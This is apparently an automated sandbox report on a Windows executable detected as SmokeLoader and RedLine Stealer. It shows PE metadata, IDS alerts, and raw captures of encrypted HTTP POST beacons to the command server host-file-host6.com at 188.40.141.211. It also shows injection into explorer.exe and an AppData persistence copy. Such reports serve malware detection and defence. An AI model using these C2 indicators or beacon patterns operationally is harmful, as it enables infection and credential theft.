IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x28a28 | 0x28c00 | c095df63e7151fea8c2bd339789d7783 | False | 0.7269878738496932 | data | 7.320070104865159 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2a000 | 0x38b548 | 0x4800 | 17c6a1d7e5d47af4f6cfb7d9079160dc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3b6000 | 0x6668 | 0x6800 | e7f422aef4e042a1ea53282032f834bc | False | 0.45845853365384615 | data | 4.308474363469441 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3b62b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland | 0.29693140794223827
RT_ICON | 0x3b62b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway | 0.29693140794223827
RT_ICON | 0x3b62b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden | 0.29693140794223827
RT_ICON | 0x3b6b58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland | 0.28330206378986866
RT_ICON | 0x3b6b58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway | 0.28330206378986866
RT_ICON | 0x3b6b58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden | 0.28330206378986866
RT_ICON | 0x3b7c28 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland | 0.6534296028880866
RT_ICON | 0x3b7c28 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway | 0.6534296028880866
RT_ICON | 0x3b7c28 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden | 0.6534296028880866
RT_ICON | 0x3b84d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland | 0.4794605809128631
RT_ICON | 0x3b84d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway | 0.4794605809128631
RT_ICON | 0x3b84d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden | 0.4794605809128631
RT_ICON | 0x3baa78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland | 0.5077392120075047
RT_ICON | 0x3baa78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway | 0.5077392120075047
RT_ICON | 0x3baa78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden | 0.5077392120075047
RT_STRING | 0x3bbd60 | 0x1e2 | Matlab v4 mat-file (little endian) L, numeric, rows 0, columns 0 | Sami Lappish | Finland | 0.504149377593361
RT_STRING | 0x3bbd60 | 0x1e2 | Matlab v4 mat-file (little endian) L, numeric, rows 0, columns 0 | Sami Lappish | Norway | 0.504149377593361
RT_STRING | 0x3bbd60 | 0x1e2 | Matlab v4 mat-file (little endian) L, numeric, rows 0, columns 0 | Sami Lappish | Sweden | 0.504149377593361
RT_STRING | 0x3bbf48 | 0x18c | data | Sami Lappish | Finland | 0.5151515151515151
RT_STRING | 0x3bbf48 | 0x18c | data | Sami Lappish | Norway | 0.5151515151515151
RT_STRING | 0x3bbf48 | 0x18c | data | Sami Lappish | Sweden | 0.5151515151515151
RT_STRING | 0x3bc0d8 | 0x372 | data | Sami Lappish | Finland | 0.47165532879818595
RT_STRING | 0x3bc0d8 | 0x372 | data | Sami Lappish | Norway | 0.47165532879818595
RT_STRING | 0x3bc0d8 | 0x372 | data | Sami Lappish | Sweden | 0.47165532879818595
RT_STRING | 0x3bc450 | 0x216 | data | Sami Lappish | Finland | 0.5056179775280899
RT_STRING | 0x3bc450 | 0x216 | data | Sami Lappish | Norway | 0.5056179775280899
RT_STRING | 0x3bc450 | 0x216 | data | Sami Lappish | Sweden | 0.5056179775280899
RT_GROUP_ICON | 0x3bbb20 | 0x30 | data | Sami Lappish | Finland | 0.9375
RT_GROUP_ICON | 0x3bbb20 | 0x30 | data | Sami Lappish | Norway | 0.9375
RT_GROUP_ICON | 0x3bbb20 | 0x30 | data | Sami Lappish | Sweden | 0.9375
RT_GROUP_ICON | 0x3b7c00 | 0x22 | data | Sami Lappish | Finland | 0.9705882352941176
RT_GROUP_ICON | 0x3b7c00 | 0x22 | data | Sami Lappish | Norway | 0.9705882352941176
RT_GROUP_ICON | 0x3b7c00 | 0x22 | data | Sami Lappish | Sweden | 0.9705882352941176
RT_VERSION | 0x3bbb50 | 0x20c | data | | | 0.5477099236641222
DLL | Import
KERNEL32.dll | SetThreadContext, WriteConsoleInputW, WriteConsoleOutputCharacterA, DeleteVolumeMountPointA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, GetSystemWindowsDirectoryW, GetFileAttributesExA, _lclose, MoveFileWithProgressA, GetModuleHandleW, LocalFlags, GetPrivateProfileStringW, ReadConsoleW, GetCompressedFileSizeW, SetCommState, ActivateActCtx, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, CreateEventA, SetConsoleCP, GlobalFlags, GetConsoleAliasW, SetTimeZoneInformation, SetSystemPowerState, TerminateProcess, CreateFileW, FindFirstFileW, ReplaceFileA, DisconnectNamedPipe, GetTempPathW, GetNamedPipeHandleStateW, GlobalUnfix, FindFirstFileA, ReadConsoleOutputCharacterA, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerW, GetFileType, BuildCommDCBAndTimeoutsW, RemoveDirectoryW, AddAtomA, FoldStringW, GetModuleHandleA, WriteProfileStringW, VirtualProtect, GetConsoleCursorInfo, SetThreadAffinityMask, SetProcessShutdownParameters, GetWindowsDirectoryW, GetConsoleProcessList, GetVolumeInformationW, ExpandEnvironmentStringsW, WriteConsoleW, SetStdHandle, FlushFileBuffers, GetConsoleMode, GetCommandLineW, SetProcessAffinityMask, CreateActCtxA, GetVolumeNameForVolumeMountPointA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, WideCharToMultiByte, HeapFree, HeapAlloc, ExitProcess, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, WriteFile, GetModuleFileNameW, GetLocaleInfoW, HeapSize, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeW, HeapReAlloc, SetFilePointer, GetConsoleCP, CloseHandle
USER32.dll | CharUpperA, RegisterClassA, CharToOemBuffA
GDI32.dll | GetCharWidthFloatW
ADVAPI32.dll | ClearEventLogA
Language of compilation system | Country where language is spoken | Map
Sami Lappish | Finland |
Sami Lappish | Norway |
Sami Lappish | Sweden |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T14:53:55.228635+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:53:55.228635+0100 | 2851815 | ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:53:56.103539+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:53:56.103539+0100 | 2851815 | ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.048517+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.048517+0100 | 2851815 | ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.650388+0100 | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.650388+0100 | 2851815 | ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 | 1 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 14:53:53.777303934 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:53.896908998 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:53.897305965 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:53.897305965 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:53.897305965 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:54.018362999 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:54.018379927 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:55.174690962 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:55.228635073 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:55.508445024 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:55.508445024 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:53:55.627897978 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:55.628220081 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:56.063112020 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:53:56.103538990 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:54:20.492881060 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:54:20.492921114 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:54:20.612410069 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:54:20.612492085 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:54:21.041851997 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:54:21.048516989 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:54:21.051570892 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Dec 9, 2024 14:54:21.168734074 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:54:21.171004057 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:54:21.597897053 CET | 80 | 49705 | 188.40.141.211 | 192.168.2.10
Dec 9, 2024 14:54:21.650388002 CET | 49705 | 80 | 192.168.2.10 | 188.40.141.211
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 14:53:51.910289049 CET | 52149 | 53 | 192.168.2.10 | 1.1.1.1
Dec 9, 2024 14:53:52.900516033 CET | 52149 | 53 | 192.168.2.10 | 1.1.1.1
Dec 9, 2024 14:53:53.773339033 CET | 53 | 52149 | 1.1.1.1 | 192.168.2.10
Dec 9, 2024 14:53:53.773375988 CET | 53 | 52149 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 14:53:51.910289049 CET | 192.168.2.10 | 1.1.1.1 | 0x4c8f | Standard query (0) | host-file-host6.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 14:53:52.900516033 CET | 192.168.2.10 | 1.1.1.1 | 0x4c8f | Standard query (0) | host-file-host6.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 14:53:53.773339033 CET | 1.1.1.1 | 192.168.2.10 | 0x4c8f | No error (0) | host-file-host6.com | | 188.40.141.211 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 14:53:53.773375988 CET | 1.1.1.1 | 192.168.2.10 | 0x4c8f | No error (0) | host-file-host6.com | | 188.40.141.211 | A (IP address) | IN (0x0001) | false
• spylvifr.net
  • host-file-host6.com
• ubpctscp.net
• lrvsgmets.com
• iwtkhvgidl.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | 3968 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 14:53:53.897305965 CET | 272 | OUT | POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://spylvifr.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 265
    Host: host-file-host6.com
Dec 9, 2024 14:53:53.897305965 CET | 265 | OUT | Data Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d dd a1 0a
    Data Ascii: I3~CAMbYofh9\Fu$f]d9n?YINNT*da%,i7q,,_T%*!'<JuVpS<=$dc>3Kp: ?OLhA03aFXPoLr{OQ>,__tDG'
Dec 9, 2024 14:53:55.174690962 CET | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Mon, 09 Dec 2024 13:53:54 GMT
    Data Raw: 03 00 00 00 7b fa b1
    Data Ascii: {
Dec 9, 2024 14:53:55.508445024 CET | 272 | OUT | POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://ubpctscp.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 144
    Host: host-file-host6.com
Dec 9, 2024 14:53:55.508445024 CET | 144 | OUT | Data Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de ec 66 5d 02 c8 a1 c1 64 12 ba bd 61
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]day)kEqk.RcLB}(cb0b,c)yyI^q j5\]m
                                                                                        Dec 9, 2024 14:53:56.063112020 CET144INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 0
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:53:55 GMT
                                                                                        Dec 9, 2024 14:54:20.492881060 CET273OUTPOST / HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Accept: */*
                                                                                        Referer: http://lrvsgmets.com/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                        Content-Length: 147
                                                                                        Host: host-file-host6.com
                                                                                        Dec 9, 2024 14:54:20.492921114 CET147OUTData Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 4b c6 cd 23
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]dK#f"D4JA!TD9Z|rGNFq6uw)>9QO
                                                                                        Dec 9, 2024 14:54:21.041851997 CET151INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 7
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:54:20 GMT
                                                                                        Data Raw: 03 00 00 00 7b fa b1
                                                                                        Data Ascii: {
                                                                                        Dec 9, 2024 14:54:21.048516989 CET274OUTPOST / HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Accept: */*
                                                                                        Referer: http://iwtkhvgidl.com/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                        Content-Length: 274
                                                                                        Host: host-file-host6.com
                                                                                        Dec 9, 2024 14:54:21.051570892 CET274OUTData Raw: 10 87 83 98 19 84 d0 b1 bd 49 0a 33 7e c3 91 f3 43 16 ac 41 a4 4d 62 ed bf ec af 82 8f d7 96 f5 1e b1 59 d4 1c 6f ba e2 e0 dd f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de ec 66 5d 02 c8 a1 c1 64 20 9a b9 23
                                                                                        Data Ascii: I3~CAMbYofh9\Fu$f]d #wczLlJ6N}klie3w)LL\L8G?5P%]qU0#""OT6X9x3V("ZThT)\4F'WHp\!?G=x8
                                                                                        Dec 9, 2024 14:54:21.597897053 CET144INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Content-Length: 0
                                                                                        Content-Type: application/octet-stream
                                                                                        Date: Mon, 09 Dec 2024 13:54:21 GMT


                                                                                        Target ID:0
                                                                                        Start time:08:53:23
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\Desktop\e6reA52T4I.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\e6reA52T4I.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:08:53:27
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\Desktop\e6reA52T4I.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\e6reA52T4I.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:08:53:32
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Windows\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                        Imagebase:0x7ff609fd0000
                                                                                        File size:5'141'208 bytes
                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:5
                                                                                        Start time:08:53:52
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 82%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:08:53:58
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Roaming\hdeufvw
                                                                                        Imagebase:0x400000
                                                                                        File size:212'992 bytes
                                                                                        MD5 hash:855E7CD7024D340B83123C75D9D4FB1C
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:8.6%
                                                                                          Dynamic/Decrypted Code Coverage:7.2%
                                                                                          Signature Coverage:8.8%
                                                                                          Total number of Nodes:1024
                                                                                          Total number of Limit Nodes:26
                                                                                          execution_graph 8036 407b2d 8083 40b330 8036->8083 8038 407b39 GetStartupInfoW 8039 407b4d HeapSetInformation 8038->8039 8041 407b58 8038->8041 8039->8041 8084 40ad8e HeapCreate 8041->8084 8042 407ba6 8043 407bb1 8042->8043 8131 407b04 8042->8131 8139 40a913 GetModuleHandleW 8043->8139 8046 407bb7 8047 407bc3 __RTC_Initialize 8046->8047 8048 407bbb 8046->8048 8085 40b0c5 GetStartupInfoW 8047->8085 8049 407b04 _fast_error_exit 56 API calls 8048->8049 8050 407bc2 8049->8050 8050->8047 8053 407bd4 8164 4078c5 8053->8164 8054 407bdc GetCommandLineW 8098 40c528 GetEnvironmentStringsW 8054->8098 8058 407bec 8171 40c47a GetModuleFileNameW 8058->8171 8060 407bf6 8061 407c02 8060->8061 8062 407bfa 8060->8062 8104 40c248 8061->8104 8063 4078c5 __amsg_exit 56 API calls 8062->8063 8065 407c01 8063->8065 8065->8061 8067 407c13 8118 4076a4 8067->8118 8068 407c0b 8069 4078c5 __amsg_exit 56 API calls 8068->8069 8071 407c12 8069->8071 8071->8067 8072 407c1a 8073 407c1f 8072->8073 8076 407c26 __wwincmdln 8072->8076 8074 4078c5 __amsg_exit 56 API calls 8073->8074 8075 407c25 8074->8075 8075->8076 8076->8075 8124 425d20 8076->8124 8079 407c55 8178 4078a7 8079->8178 8082 407c5a __mtinitlocknum 8083->8038 8084->8042 8181 4099fc 8085->8181 8087 40b0e3 8087->8087 8089 4099fc __calloc_crt 56 API calls 8087->8089 8092 40b1d8 8087->8092 8093 407bd0 8087->8093 8094 40b258 8087->8094 8088 40b28e GetStdHandle 8088->8094 8089->8087 8090 40b2f2 SetHandleCount 8090->8093 8091 40b2a0 GetFileType 8091->8094 8092->8094 8095 40b204 GetFileType 8092->8095 8096 40b20f InitializeCriticalSectionAndSpinCount 8092->8096 8093->8053 8093->8054 8094->8088 8094->8090 8094->8091 8097 40b2c6 InitializeCriticalSectionAndSpinCount 8094->8097 8095->8092 8095->8096 8096->8092 8096->8093 8097->8093 8097->8094 8099 40c539 8098->8099 8100 40c53d 8098->8100 8099->8058 8101 4099b7 __malloc_crt 56 API calls 8100->8101 8102 40c55f 
_memmove 8101->8102 8103 40c566 FreeEnvironmentStringsW 8102->8103 8103->8058 8105 40c260 _wcslen 8104->8105 8109 407c07 8104->8109 8106 4099fc __calloc_crt 56 API calls 8105->8106 8112 40c284 _wcslen 8106->8112 8107 40c2da 8108 40742e _free 56 API calls 8107->8108 8108->8109 8109->8067 8109->8068 8110 4099fc __calloc_crt 56 API calls 8110->8112 8111 40c300 8113 40742e _free 56 API calls 8111->8113 8112->8107 8112->8109 8112->8110 8112->8111 8114 411a7b __wsetenvp 56 API calls 8112->8114 8115 40c317 8112->8115 8113->8109 8114->8112 8116 40ac42 __invoke_watson 5 API calls 8115->8116 8117 40c323 8116->8117 8120 4076b2 __IsNonwritableInCurrentImage 8118->8120 8378 40bdc1 8120->8378 8121 4076d0 __initterm_e 8123 4076f1 __IsNonwritableInCurrentImage 8121->8123 8381 407a06 8121->8381 8123->8072 8125 426cb1 CharUpperA 8124->8125 8125->8125 8126 426cb8 8125->8126 8452 4257e0 8126->8452 8129 407c47 8129->8079 8175 40787b 8129->8175 8130 4272d9 GetTempPathW 8130->8129 8132 407b12 8131->8132 8133 407b17 8131->8133 8134 40b6f4 __FF_MSGBANNER 56 API calls 8132->8134 8135 40b545 __NMSG_WRITE 56 API calls 8133->8135 8134->8133 8136 407b1f 8135->8136 8137 407623 __mtinitlocknum 3 API calls 8136->8137 8138 407b29 8137->8138 8138->8043 8140 40a930 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8139->8140 8141 40a927 8139->8141 8143 40a97a TlsAlloc 8140->8143 9201 40a660 8141->9201 8146 40a9c8 TlsSetValue 8143->8146 8147 40aa89 8143->8147 8146->8147 8148 40a9d9 8146->8148 8147->8046 9210 40764d 8148->9210 8153 40aa21 DecodePointer 8156 40aa36 8153->8156 8154 40aa84 8155 40a660 __mtterm 59 API calls 8154->8155 8155->8147 8156->8154 8157 4099fc __calloc_crt 56 API calls 8156->8157 8158 40aa4c 8157->8158 8158->8154 8159 40aa54 DecodePointer 8158->8159 8160 40aa65 8159->8160 8160->8154 8161 40aa69 8160->8161 8162 40a69d __getptd_noexit 56 API calls 8161->8162 8163 40aa71 GetCurrentThreadId 8162->8163 8163->8147 8165 40b6f4 __FF_MSGBANNER 56 API calls 8164->8165 8166 4078cf 
